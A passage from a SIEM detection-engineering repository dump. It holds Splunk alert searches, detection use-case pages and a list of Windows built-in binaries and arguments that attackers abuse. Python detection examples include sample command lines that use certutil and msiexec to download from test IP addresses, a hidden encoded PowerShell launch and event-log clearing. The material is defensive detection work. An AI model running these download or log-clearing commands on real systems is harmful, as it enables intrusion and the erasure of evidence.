"0xc000015b","The user has not been granted the requested logon type (aka logon right) at this machine"
--------------------------------------------------------------------------------
/Metrics.md:
--------------------------------------------------------------------------------
Metrics require fields, queries, and manual work. This section also suggests which ticketing system and form fields are recommended to allow proper recording/reporting of metrics.

# Recommended Fields for Metric Collection
- DateTime Occurred
- DateTime Detected
- DateTime Contained
- DateTime Expelled
- DateTime Owner Notified
- DateTime Escalated
- Recommended Mitigation
- Severity
- Source Use Case
- Source Signature
- Origination
- MITRE ATT&CK Technique

# Recommended Metrics
- Average Cost Per Incident
- Average Time to Detect
- Average Time to Escalate
- Average Time to Contain
- Average Time to Expel
- Average Time to Notify
- Incidents Opened in a given time frame
- Incidents Closed in a given time frame
- Count of Incidents per Recommended Mitigation
- Count of Incidents per Severity
- Count of Incidents per Severity Not Reviewed Within Required Time
- Count of Incidents per Alert/Rule/Signature
- Count of Incidents per Use Case
- Count of False Positive Incidents Per Use Case
- Count of Incidents per Attack Technique


See Also
- [Incident Tracking](/incident-tracking.md)
--------------------------------------------------------------------------------
/Orientation/crown-jewels.md:
--------------------------------------------------------------------------------
## Crown Jewels
The crown jewels should be identified, and significant effort should be made to protect them.

- What is the most sensitive data and where is it stored?
- Which are the most sensitive services and what infrastructure supports them?
- Which service accounts exist to support them?
- What are the permitted access methods?
- Who has authority to access these?
- What logs are available for monitoring?
- Which people would cause the most damage if they were socially engineered or their accounts were compromised or abused?
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
These resources are intended to guide a SIEM team to...
* ... develop a workflow for content creation (and retirement) in the SIEM and other security tools.
* ... illustrate detection coverage provided and highlight coverage gaps as goals to fill.
* ... eliminate or add additional layers of coverage based on organizational needs.
* ... ensure proper logs are generated and recorded for sufficient detection, investigation, and compliance.

# Preparation, Prerequisites, etc.
Without covering the basics, there isn't much point in having a SIEM. Harden your environment and configure appropriate auditing on all endpoints.
- [Preparation](/Preparation.md)
- [Incident Response Policy Sample](/Documentation-Templates/Incident-Response-Policy.md)
- [RSS Feeds, Subscriptions, etc](/osintel.md)
- [Logging](/Logging.md)
- [Notable Event IDs](/Notable-Event-IDs.md)
- [IR Tools & Resources](/response-tools-resources.md)
- [Incident Tracking](/incident-tracking.md)
- [Metrics](/Metrics.md)
- [Attacker Tools](/attack-tools-resources.md)

## Hardening
- [DNS Security](/hardening/dns-security.md)
- [Email Security](/hardening/email-security.md)
- [General Security](/hardening/general-security.md)
- Microsoft 365
  - [Auditing and Reporting](/hardening/microsoft-365-auditing-and-reporting.md)
  - [Azure AD](/hardening/microsoft-365-azure-ad.md)
  - [Exchange](/hardening/microsoft-365-exchange.md)
  - [SharePoint and OneDrive](/hardening/microsoft-365-sharepoint-and-onedrive.md)
  - [Teams](/hardening/microsoft-365-teams.md)
- [Microsoft Active Directory](/hardening/microsoft-active-directory.md)
- [Microsoft Windows DNS](/hardening/microsoft-windows-dns.md)
- [Microsoft Windows](/hardening/microsoft-windows.md)
- [Network](/hardening/network.md)
- [Remote Access](/hardening/remote-access.md)
- [Software Manufacturers](/hardening/software-manufacturers.md)
- [Web Security](/hardening/web-security.md)


# [Detection Tactics](/Detection-Tactics.md)

To detect an attacker, one must be equipped with the necessary logs to reveal their activities. Here we use a matrix to map detection tactics to attacker tactics ([Mitre ATT&CK](https://attack.mitre.org/)).


# [Detection Methods](/Detection-Methods.md)

Once the necessary logs are collected (detection tactics), use various methods to reveal anomalous, suspicious, and malicious activity.


# Detection Use Cases

Use Cases provide a means to document solutions for many reasons, including tracking work, uniform response, content recreation, metrics & reporting, making informed decisions, avoiding work duplication, and more.

- [Use Case Structure](/Use-Case-Structure.md)
- [Use Case Review](/Use-Cases.md)


# Data Enrichment

These efforts can provide significant benefits to some ingested logs. Typically, enrichment results in either a new field added to events or a lookup table used for filtering or for filling in a field.

- GeoIP/ASN Lookup
- Levenshtein Distance
- Shannon Entropy Scores
- String Lengths
- Top 1 Million Domains
- WHOIS Caching
- DNS Lookup
- Reverse-DNS Lookup
- Certificate Parsing
- [O365 Principal App IDs](/Lookups/o365-principalappid.csv)
- [Windows Logon Type Lookups](/Lookups/windows-logon-type.csv)
- [Windows Status Code Lookups](/Lookups/windows-status-code.csv)


# [Lab](/Lab/WindowsVictim.md)
Set up a lab with a Windows system, a SIEM, and an attacking system to aid in detection research and development.
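Three of the enrichments listed under Data Enrichment (Levenshtein distance, Shannon entropy, string length) together with the two Windows lookups, as an added Python example that is not part of this repository; it also covers the Levenshtein and Shannon entropy alerts listed later under Account Creation. The lookup subsets are copied from the repository's CSVs; thresholds, privileged names and sample events are assumptions.

```python
"""Enrichment helpers for account-creation and logon events.

Added example, not code from the SIEM repository. Thresholds, the privileged
name list and the sample events are assumptions to tune per environment.
"""
import csv
import io
import math
from collections import Counter

# Subsets of Lookups/windows-logon-type.csv and windows-status-code.csv,
# embedded so the example runs offline.
LOGON_TYPE_CSV = '''"Logon Type","Description"
"2","Interactive"
"3","Network"
"5","Service"
"10","RemoteInteractive"
'''
STATUS_CODE_CSV = '''"Status Code","Description"
"0xC0000064","user name does not exist"
"0xC000006A","user name is correct but the password is wrong"
"0xC0000234","user is currently locked out"
'''


def load_lookup(text, key, value):
    """Build a case-insensitive dict from a two-column CSV lookup."""
    return {row[key].lower(): row[value] for row in csv.DictReader(io.StringIO(text))}


LOGON_TYPES = load_lookup(LOGON_TYPE_CSV, "Logon Type", "Description")
STATUS_CODES = load_lookup(STATUS_CODE_CSV, "Status Code", "Description")
PRIVILEGED_NAMES = ("admin", "administrator")  # look-alike targets (assumed)


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute), case-insensitive."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def shannon_entropy(s):
    """Bits per character; random-looking names score higher than words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def enrich_account_name(name, max_distance=2, entropy_threshold=3.5):
    """Enrichment fields and flags for an Account Creation (4720-style) event."""
    distances = {p: levenshtein(name, p) for p in PRIVILEGED_NAMES}
    closest = min(distances, key=distances.get)
    fields = {"name": name, "name_length": len(name),
              "name_entropy": round(shannon_entropy(name), 3),
              "closest_privileged": closest, "levenshtein": distances[closest],
              "flags": []}
    # Distance 0 is the real account; 1..max_distance is a look-alike.
    if 0 < distances[closest] <= max_distance:
        fields["flags"].append("lookalike:" + closest)
    if fields["name_entropy"] >= entropy_threshold:
        fields["flags"].append("high_entropy")
    return fields


def enrich_logon(event):
    """Translate LogonType and Status of a 4624/4625-style event via the lookups."""
    out = dict(event)
    out["logon_type_desc"] = LOGON_TYPES.get(str(event.get("LogonType", "")).lower(), "unknown")
    out["status_desc"] = STATUS_CODES.get(str(event.get("Status", "")).lower(), "unknown")
    return out


# Constructed sample data.
NEW_ACCOUNTS = ["jsmith", "Adminstrator", "q7w3e9r2t8y4u1i6", "admin"]
FAILED_LOGON = {"EventID": 4625, "TargetUserName": "jsmith", "LogonType": "3",
                "Status": "0xc000006a", "IpAddress": "10.0.0.7"}

if __name__ == "__main__":
    for n in NEW_ACCOUNTS:
        print(enrich_account_name(n))
    print(enrich_logon(FAILED_LOGON))
```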


# TODO
- [ ] Add Use Case Examples
- [ ] Add Threat Hunts Library
- [ ] Add an object oriented, relational database approach to recording and associating all elements to one another - cases, adversaries, techniques, mitigations, detections, hunts, log sources, etc.

--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-config-change-spike.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:config NOT command IN (request, commit) earliest=-1h
| fields index, host, src_user, src, dest, command, path
| bucket _time span=1h
| stats count as change_count values(path) as targets by index, host, src_user, src, dest, command
| where change_count > 10
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-config-change-unknown-user.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:config NOT command IN (request, commit) NOT src_user IN (user1, user2, user3) earliest=-1h
| fields index, host, src_user, src, dest, command, path
| stats count as change_count values(path) as targets by index, host, src_user, src, dest, command
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-failed-logon-spike.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:system event_id=auth-fail earliest=-1h
| rex field=body "From: (?<src_ip>(?:\d{1,3}\.){3}\d{1,3})"
| bucket _time span=1h ``` group into hourly bins; without this every event keeps its own _time and the count never exceeds 1 ```
| stats count as failed_attempts by _time, index, host, src_ip
| where failed_attempts > 5
| table _time, index, host, src_ip, failed_attempts
| sort - _time
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-large-transfer.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic earliest=-1h
| eval transfer_mb=bytes_out/1024/1024
| eval hour_of_day=strftime(_time, "%H")
```| where hour_of_day < "08" OR hour_of_day > "18" ```
| stats sum(transfer_mb) as total_transfer_mb by src_ip, dest_ip, app, hour_of_day
| where total_transfer_mb > 1024
| table src_ip, dest_ip, app, total_transfer_mb, hour_of_day
| eval total_transfer_mb=round(total_transfer_mb, 2)
| sort - total_transfer_mb
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-src_ip-dest_port-spike.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic action=allowed earliest=-1h
| stats dc(dest_port) as dest_port_count by index, src_ip
| where dest_port_count > 100
| table index, src_ip, dest_port_count
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-src_ip-distinct-dest_ip-spike.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic earliest=-1h
| stats dc(dest_ip) as dest_ip_count values(dest_ip) as dest_ips by index, src_ip
| where dest_ip_count > 10
| table index, src_ip, dest_ips, dest_ip_count
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-src_ip-unknown-dest_ip-spike.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic action!=blocked NOT (dest_ip IN ("192.*", "172.*", "10.*")) earliest=-1h ``` note: 192.* and 172.* are wider than the RFC 1918 ranges (192.168/16, 172.16/12); narrow them if public 192.x or 172.x destinations matter ```
| stats dc(dest_ip) as dest_ip_count values(dest_ip) as dest_ips by index, src_ip
| where dest_ip_count > 2
| table index, src_ip, dest_ips, dest_ip_count
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-suspicious-dest_port.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic action!=blocked NOT (dest_port IN (1197, 1198, 123, 14000, 2638, 3389, 443, 445, 5001, 53, 5450, 9997, 22)) earliest=-1h
| stats count by index, src_ip, transport, dest_port
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-threat-detected.md:
--------------------------------------------------------------------------------
[Palo Alto - Threat Detected]
action.email = 1
action.email.include.search = 1
action.email.inline = 1
action.email.sendcsv = 1
action.email.sendresults = 1
action.email.to = someone@example.com
action.email.useNSSubject = 1
action.webhook.enable_allowlist = 0
alert.expires = 5m
alert.suppress = 0
alert.track = 0
counttype = number of events
cron_schedule = 0 */2 * * *
dispatch.earliest_time = -2h
dispatch.latest_time = now
display.events.fields = ["host","source","sourcetype","eventid","Commandline"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.chartHeight = 267
display.visualizations.charting.chart = line
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = search
request.ui_dispatch_view = search
search = index="pan_logs" sourcetype=pan:threat src_ip!="your-scanner"\
| rename "app:category" as app_category \
| fields _time host log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port\
| foreach log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port \
    [ eval <<FIELD>> = if( (len(<<FIELD>>)=0 OR (<<FIELD>>)="" OR isnull(<<FIELD>>)), "-", <<FIELD>>) ] \
| rename host as PaloAlto\
| table _time PaloAlto log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port\
| sort - _time
--------------------------------------------------------------------------------
/Signatures/Splunk/panorama-unkown-app-protocol.md:
--------------------------------------------------------------------------------
index=pan_logs sourcetype=pan:traffic earliest=-1h
| search NOT(app IN (dns-base, ssl, paloalto-updates, pan-db-cloud, sybase, ntp-base, ms-rdp, ms-ds-smbv3, osisoft-pi-v3, unknown-udp, unknown-tcp, insufficient-data, incomplete, splunk, ssh, paloalto-shared-services))
| stats count by index, src_ip, dest_ip, app, action
| where action="allowed"
| table index, src_ip, dest_ip, app, action, count
| sort - count
--------------------------------------------------------------------------------
/Signatures/Splunk/sourcetype-outage-dynamic.md:
--------------------------------------------------------------------------------
````
[Stable SourceType Outage]
action.email = 1
action.email.inline = 1
action.email.sendresults = 1
action.email.to = some@one.com
action.email.useNSSubject = 1
action.webhook.enable_allowlist = 0
alert.expires = 7d
alert.suppress = 0
alert.track = 0
counttype = number of events
cron_schedule = 0 6,14 * * *
description = Triggered when sourcetype/index pairs that typically produce data have stopped. Ignores sourcetypes that do not reliably produce events.
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
enableSched = 1
quantity = 0
relation = greater than
request.ui_dispatch_app = your_app
request.ui_dispatch_view = search
search = | eventcount summarize=false index=* \
| stats sum(count) as IndexEventCount by index \
| where IndexEventCount > 0\
| map [|metadata type=sourcetypes index="$index$" | eval index="$index$"] maxsearches=1000\
| lookup eventcount_stats.csv index sourcetype OUTPUT Perc10EventCount, Perc25EventCount\
| where totalCount > 100 ``` Do not monitor empty or temporarily used sourcetypes```\
| search (Perc10EventCount >= 5) OR (Perc25EventCount >= 20) ``` Do not monitor event types that produce infrequent or a very small number of results, as they can produce an overly sensitive alert unrelated to the actual data pipeline health ```\
| where recentTime > relative_time(now(),"-7d") ``` Do not monitor sourcetypes not seen in 7 days```\
| where recentTime < relative_time(now(),"-1d") ``` Alert on sourcetypes not seen in over 1 day```\
| eval age = now()-recentTime\
| eval TimeSince = tostring(age,"duration")\
| convert timeformat="%F %T %Z" ctime(lastTime), ctime(recentTime), ctime(firstTime)\
| eval Perc10EventCount = round(Perc10EventCount,1)\
| fields index sourcetype TimeSince Perc10EventCount Perc25EventCount recentTime lastTime firstTime
````


````
[LookupTable - eventcount_stats.csv]
action.email.useNSSubject = 1
action.webhook.enable_allowlist = 0
alert.track = 0
cron_schedule = 0 21 * * 3
dispatch.earliest_time = -30d@d
dispatch.latest_time = now
display.general.type = statistics
display.page.search.mode = fast
display.page.search.tab = statistics
display.visualizations.show = 0
enableSched = 1
request.ui_dispatch_app = search
request.ui_dispatch_view = search
search = | eventcount summarize=false index=* \
| stats sum(count) as IndexEventCount by index \
| where IndexEventCount > 0\
| map [| tstats count WHERE index=$index$ by _time sourcetype span=1d | timechart sum(count) as count by sourcetype limit=0 span=1d | fillnull value=0 | untable _time sourcetype count | stats perc5(count) as Perc05EventCount, perc10(count) as Perc10EventCount, perc25(count) as Perc25EventCount, perc50(count) as Perc50EventCount, perc95(count) as Perc95EventCount, avg(count) as AvgEventCount, sum(count) as TotalEventCount, min(_time) as StartTime, max(_time) as EndTime by sourcetype | eval index="$index$" ] maxsearches=1000 ``` timechart & untable required to create time bins with 0 events ```\
| table index, sourcetype, StartTime, EndTime, *EventCount\
| fieldformat EndTime = strftime(EndTime, "%F %T %Z")\
| fieldformat StartTime = strftime(StartTime, "%F %T %Z")\
| outputlookup eventcount_stats.csv override_if_empty=false
````

--------------------------------------------------------------------------------
/Signatures/Splunk/splunk-general.md:
--------------------------------------------------------------------------------
### Generic Event Feed Down
Check the latest 7 days for logs, then review the last day. If a log source has no logs for an entire day, `recent` equals zero, and that is worth firing an alert to the administrator.
```
| tstats latest(_time) as latest where index=* earliest=-7d by sourcetype, index
| eval recent = if(latest > relative_time(now(),"-1d"),1,0)
| eval latest = strftime(latest,"%c")
| where recent = 0
| table index sourcetype latest recent
```

### Single Event Feed Down

Use a time window based on how frequently events are expected from each particular source.
```
| tstats dc(host) as "Host Count" count as "Event Count" where index="yourindex"
```

### Auto Pruning Event Feed Down
Used together, these two searches ensure that only stabilized sourcetypes generate alerts when they go down.

Lookup Table Report:
- Schedule: run once a week (choose a day and time)
- Time Range: Last 60d
````
| eventcount summarize=false index=*
| stats sum(count) as IndexEventCount by index
| where IndexEventCount > 0
| map
    [| tstats count WHERE index=$index$ by _time sourcetype span=1d
    | timechart sum(count) as count by sourcetype limit=0 span=1d
    | fillnull value=0
    | untable _time sourcetype count
    | stats perc10(count) as Perc10EventCount, avg(count) as AvgEventCount, sum(count) as TotalEventCount, min(_time) as StartTime, max(_time) as EndTime by sourcetype
    | eval index="$index$" ] maxsearches=1000 ``` timechart & untable required to create time bins with 0 events ```
| table index, sourcetype, StartTime, EndTime, *EventCount
| fieldformat EndTime = strftime(EndTime, "%F %T %Z")
| fieldformat StartTime = strftime(StartTime, "%F %T %Z")
| outputlookup eventcount_stats.csv override_if_empty=false
````

Saved Search (alert):
- Time Range: Last 24h
- Cron Expression to run every 12 hours: 0 */12 * * *
- Expires: 7d
````
| eventcount summarize=false index=*
| stats sum(count) as IndexEventCount by index
| where IndexEventCount > 0
| map
    [| metadata type=sourcetypes index="$index$"
    | eval index="$index$"] maxsearches=1000
| lookup eventcount_stats.csv index sourcetype OUTPUT Perc10EventCount
| where totalCount > 100 ``` Do not monitor empty or temporarily used sourcetypes```
| where Perc10EventCount >= 5 ``` Do not monitor event types that produce infrequent or a very small number of results, as they can produce an overly sensitive alert unrelated to the actual data pipeline health ```
| where recentTime > relative_time(now(),"-7d") ``` Do not monitor sourcetypes not seen in 7 days```
| where recentTime < relative_time(now(),"-1d") ``` Alert on sourcetypes not seen in over 1 day```
| eval age = now()-recentTime
| eval TimeSince = tostring(age,"duration")
| convert timeformat="%F %T %Z" ctime(lastTime), ctime(recentTime), ctime(firstTime)
| eval Perc10EventCount = round(Perc10EventCount,1)
| fields index sourcetype TimeSince Perc10EventCount recentTime lastTime firstTime totalCount
````
--------------------------------------------------------------------------------
/Splunk/apps/Splunk_TA_paloalto/local/props.conf:
--------------------------------------------------------------------------------
[pan:system]
# One EXTRACT-user covers both the successful and the failed message; two
# stanzas keyed EXTRACT-user would override each other and only the last
# one would apply. Named capture groups supply the field names.
EXTRACT-user = (?:authenticated|failed authentication) for user \'(?<user>[^']+)
EXTRACT-src1 = From: (?<src1>[^,]+)
EVAL-src = rtrim(src1, ".\"")
EXTRACT-Reason = Reason: (?<Reason>[^,]+)
--------------------------------------------------------------------------------
/Tactics/API-Usage.md:
--------------------------------------------------------------------------------
# API Usage Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Events per Source User/Token
- Count of Events per Target System


## Blacklist Alert
- Calls with Command-line Syntax


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples


# Possible False Positives
--------------------------------------------------------------------------------
/Tactics/Account-Creation.md:
--------------------------------------------------------------------------------
# Account Creation Use Cases

Grouped by
[Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Events per Source User


## Blacklist Alert
- Account Created Outside Business Hours
- Account Created by Non-Privileged User
- Local Account Created


## Whitelist Alert
- Account Created With Unrecognized Naming Convention


## Levenshtein Score Alert
- Account Created With Name Similar to "Admin"
- Account Created With Name Similar to "Administrator"
- Account Created With Name Similar to the local service account naming convention


## Rolling Whitelist Alert
- Newly Observed Source User


## Shannon Entropy Score Alert
- Account Created With Randomized Name


## Threshold Alert
- Count exceeds threshold


# Log Source Examples
- Windows Security Event ID 4720: A user account was created


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/Account-Logon.md:
--------------------------------------------------------------------------------
# Account Logon Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Successful/Failed Events per Hour
- Count of Successful/Failed Events per Source System
- Count of Successful/Failed Events per Source User


## Blacklist Alert
- Account Logon After Employee End Date
- Account Logon During Unusual Time of Day
- Account Logon During Unusual Day of Week
- Service Account Interactive Logon


## Whitelist Alert
- A user with an unrecognized naming convention is observed


## Levenshtein Score Alert
- Account Created With Name Similar to "Admin"
- Account Created With Name Similar to "Administrator"
- Account Created With Name Similar to the local service account naming convention


## Rolling Whitelist Alert
- Newly Observed Source User
- Newly Observed Source User=Service Account, Type=Interactive
- Newly Observed Source User, Destination Host


## Shannon Entropy Score Alert


## Threshold Alert
- User Name, Destination Host where Destination Host Count exceeds threshold
- Source Account, Outcome=Failure where Count exceeds threshold
- Source Account, Outcome=Failure, Destination Host where Destination Host Count exceeds threshold


# Log Source Examples
- Windows Security Event ID 4624: An account was successfully logged on
- Windows Security Event ID 4625: An account failed to log on
- Windows Security Event ID 4648: A logon was attempted using explicit credentials
- VPN Logons
- SSH Logons
- Application Logons


# Possible False Positives
- May pick up failed service accounts repeatedly trying to "do their job" with a locked account. Notifying the appropriate admin is a good idea here.

--------------------------------------------------------------------------------
/Tactics/Account-Modification.md:
--------------------------------------------------------------------------------
# TODO: Merge into Tactics md's

# Account Modification Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Events per Source User
- Count of Events per Target User



## Blacklist Alert
- Member Added to Privileged Group (e.g. destination group contains "admin")
- Smart Card Logon Disabled (in environments with required 2FA)



## Whitelist Alert
- Non-Privileged User Modifying Accounts
- Non-Authorized Service Account Modifying Accounts
- System Account Modifying Accounts
- Non-Privileged User Added to Privileged Group


## Levenshtein Score Alert


## Rolling Whitelist Alert
- Newly Observed Source User


## Shannon Entropy Score Alert


## Threshold Alert
- Source User, Destination User where Destination User Count exceeds threshold


# Log Source Examples
- Windows Security Event ID 4728: A member was added to a security-enabled global group
- Windows Security Event ID 4738: A user account was changed
- Windows Security Event ID 4732: A member was added to a security-enabled local group
- Windows Security Event ID 4756: A member was added to a security-enabled universal group
- Windows Security Event ID 4767: A user account was unlocked
- Windows Security Event ID 4722: A user account was enabled
- Windows Security Event ID 4723: An attempt was made to change an account's password
- Windows Security Event ID 4724: An attempt was made to reset an account's password
- Windows Security Event ID 4725: A user account was disabled
- Windows Security Event ID 4726: A user account was deleted
- Windows Security Event ID 4781: The name of an account was changed


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/Application-Log.md:
--------------------------------------------------------------------------------
# Application Log Use Cases


Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count


## Blacklist Alert


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert
- Newly Observed Host IPS Signature
- Newly Observed Host IPS Signature per System/User
- Newly Observed IPS Signature
- Newly Observed IPS Signature per Source System
- Newly Observed IPS Signature per Target System
- Newly Observed IPS Source System
- Newly Observed IPS Target System


## Shannon Entropy Score Alert


## Threshold Alert
- Signature Name where Count exceeds threshold


# Log Source Examples
- DHCP Server Logs
- Reverse Web Proxy Logs
- Host IDS Logs
- Microsoft-Windows-Windows Defender/Operational Event ID 1115
- Microsoft-Windows-Windows Defender/Operational Event ID 1116


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/Commandline-Activity.md:
--------------------------------------------------------------------------------
# Commandline Activity Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework: [Command-Line Interface (T1059)](https://attack.mitre.org/techniques/T1059), [PowerShell (T1086)](https://attack.mitre.org/techniques/T1086), [Inhibit System Recovery](https://attack.mitre.org/versions/v12/techniques/T1490/)

- Execution of malicious commands AND scripts from command-line interfaces.


## Aggregate Count
- Process file names (without path)
- Process file names (with path)
- rundll32.exe DLL Paths
- regsvr32.exe DLL Paths


## [Match Alert](https://github.com/TonyPhipps/SIEM/blob/master/Detection-Methods.md#match-alarm)


Question the use of these, as they are infrequently used legitimately:
- at.exe
- aspnet_compiler.exe
- CustomShellHost.exe to execute an explorer.exe child process
- DeviceCredentialDeployment.exe to hide a process (T1564)
- makecab.exe (T1105, T1564.004, T1036)
- pktmon.exe to capture packets (T1040)
- rpcping.exe to exploit RPC (T1003, T1187)

#### !!!! IMPORTANT NOTES !!!!
- MANY commandlines can use - OR / interchangeably. Account for this!
- Commandlines can contain junk characters like ^ to defeat detections; the command runs as if those characters were not there.
- Any inclusion of "http" can be supplemented by a pattern to match IP addresses for web communication.
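An added example, not code from the TonyPhipps/SIEM repository, showing how a detection can apply these notes: it normalizes a command line (carets dropped, `/` and `-` treated alike, "http" supplemented by an IPv4 pattern) and then tests it against a few of the image/argument pairs from the Match Alert list below and the obfuscation markers from the Blacklist Alert section; the rule names and sample command lines are constructed for this example.

```python
import re

# Added example (not code from the TonyPhipps/SIEM repository): normalize a
# Windows command line as the IMPORTANT NOTES above describe, then test it
# against a few image/argument pairs from the Match Alert list and the
# obfuscation markers from the Blacklist Alert list. Rule names and the
# sample command lines below are constructed for this example.

IPV4 = r"\b(?:\d{1,3}\.){3}\d{1,3}\b"   # supplements "http", per the notes


def normalize_cmdline(cmdline: str) -> str:
    """Fold the tricks noted above into one canonical form.

    Carets are dropped (cmd.exe ignores them), empty quote pairs are dropped,
    a "/" that introduces a switch becomes "-" so "/i" and "-i" compare equal
    (a slash inside a URL or path is preceded by ":", "/" or a word character
    and is left alone), then whitespace and case are collapsed.
    """
    s = cmdline.replace("^", "").replace('""', "")
    s = re.sub(r"(?<![\w:./\\])/(?=[A-Za-z])", "-", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def image_name(normalized: str) -> str:
    """Basename of the first token, e.g. 'powershell.exe' (quotes and path stripped)."""
    first = re.match(r'"?([^"\s]+)', normalized).group(1)
    name = re.split(r"[\\/]", first)[-1]
    return name if name.endswith(".exe") else name + ".exe"


# (rule name, image, regexes). Every regex must match the normalized command
# line (the page's AND); alternatives inside one regex are the page's OR.
# Fragments are written as they look after normalization ("/i" -> "-i").
RULES = [
    ("certutil download (T1105)", "certutil.exe", [r"-urlcache", r"http|ftp|" + IPV4]),
    ("msiexec remote package (T1218.007)", "msiexec.exe", [r"-(?:i|y)\b", r"http|ftp|" + IPV4]),
    ("powershell encoded command", "powershell.exe", [r"-(?:encodedcommand|enc|e)\b"]),
    ("powershell encoded command", "powershell_ise.exe", [r"-(?:encodedcommand|enc|e)\b"]),
    ("bcdedit recovery change (T1490)", "bcdedit.exe", [r"recoveryenabled|ignoreallfailures"]),
    ("event log cleared (T1070)", "wevtutil.exe", [r"\bcl\b|clear-log"]),
    ("cscript script host", "cscript.exe", [r"\.(?:js|jse|vb[aes]|wsf)\b|//e:"]),
    ("fsutil destructive use (T1485)", "fsutil.exe", [r"setzerodata|deletejournal"]),
]

# Markers from the Blacklist Alert list, checked on the RAW command line
# because normalization removes some of them (the caret in particular).
OBFUSCATION = [
    ("caret", r"\^"),
    ("empty quotes", r'""'),
    ("comma/semicolon run", r",;|;,|,,|;;"),
    ("comspec", r"comspec"),
    ("pipe to cmd", r"\|\s*cmd\b"),
    ("/c echo", r"/c\s+echo"),
]


def evaluate(cmdline: str) -> dict:
    """Which Match Alert rules and which obfuscation markers fire for one command line."""
    norm = normalize_cmdline(cmdline)
    image = image_name(norm)
    rules = [name for name, img, pats in RULES
             if img == image and all(re.search(p, norm) for p in pats)]
    obfuscation = [name for name, pat in OBFUSCATION
                   if re.search(pat, cmdline, re.IGNORECASE)]
    return {"image": image, "normalized": norm, "rules": rules, "obfuscation": obfuscation}


# Constructed sample command lines (not real telemetry); addresses are RFC 5737 test ranges.
SAMPLES = [
    "certutil.exe -urlc^ache -split -f http://198.51.100.7/tools.dat tools.dat",
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoP -W hidden -Enc QQBBAEEA',
    "msiexec /i http://203.0.113.9/agent.msi /qn",
    "cmd.exe /c echo %COMSPEC% | cmd",
    "cscript.exe //E:jscript C:\\Temp\\update.js",
    'cmd.exe /c dir "C:\\Program Files"',   # benign: nothing should fire
    "wevtutil cl Security",
]

if __name__ == "__main__":
    for line in SAMPLES:
        r = evaluate(line)
        print(f"{r['image']:<18} rules={r['rules']} obfuscation={r['obfuscation']}")
```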

----------------------

- addinutil.exe
  - "-AddinRoot:" to set root directory for addins

- appinstaller.exe
  - "http" to attempt to load/install a package from a URL and save in INetCache

- atbroker.exe
  - "/start" to execute code referenced in a prestaged registry key

- auditpol.exe
  - "/set" AND "disable"

- bcdedit.exe
  - "recoveryenabled"
  - "ignoreallfailures"
  - "minimal" (T1059, T1490)

- bitsadmin.exe
  - "/create" to make a new job which can download, copy, execute, and create alternate data streams

- certoc.exe
  - "-loaddll"
  - "-getcacaps"

- certreq.exe
  - "-config" AND "http" to download content
  - "-post" AND "http" to either download or upload data

- certutil.exe
  - "-urlcache" to download files
  - "url"
  - "ping"
  - "http"
  - "ftp"
  - "-decode"
  - "-encode"
  - "-addstore"

- chrome.exe
  - "headless"
  - "remote-debugging"

- cmd.exe
  - "http"
  - "ftp"
  - "reg add"
  - "^" to attempt obfuscation
  - "<" AND ":" to execute an alternate data stream
  - "DeviceCredentialDeployment.exe" to hide a process (T1564)

- cmdkey.exe
  - "/list" to list cached credentials

- cmdl32.exe
  - "/vpn" AND "/lan" to download files

- cmstp.exe
  - "/ni" AND "/s" to execute malicious .INF (T1218.003)
  - "http" to download (T1218.003)

- colorcpl.exe
  - copies any file to C:\Windows\System32\spool\drivers\color\ for staging (T1036.005)

- configsecuritypolicy.exe
  - "http" to download or upload a file (T1567 or T1105)

- conhost.exe
  - ".exe" to execute another command (T1202)
  - "--headless" to hide child process window (T1202)

- control.exe
  - ":" to execute alternate data stream (T1218.002)

- csc.exe
  - "-out:" to compile code locally, bypassing defenses. (T1127)
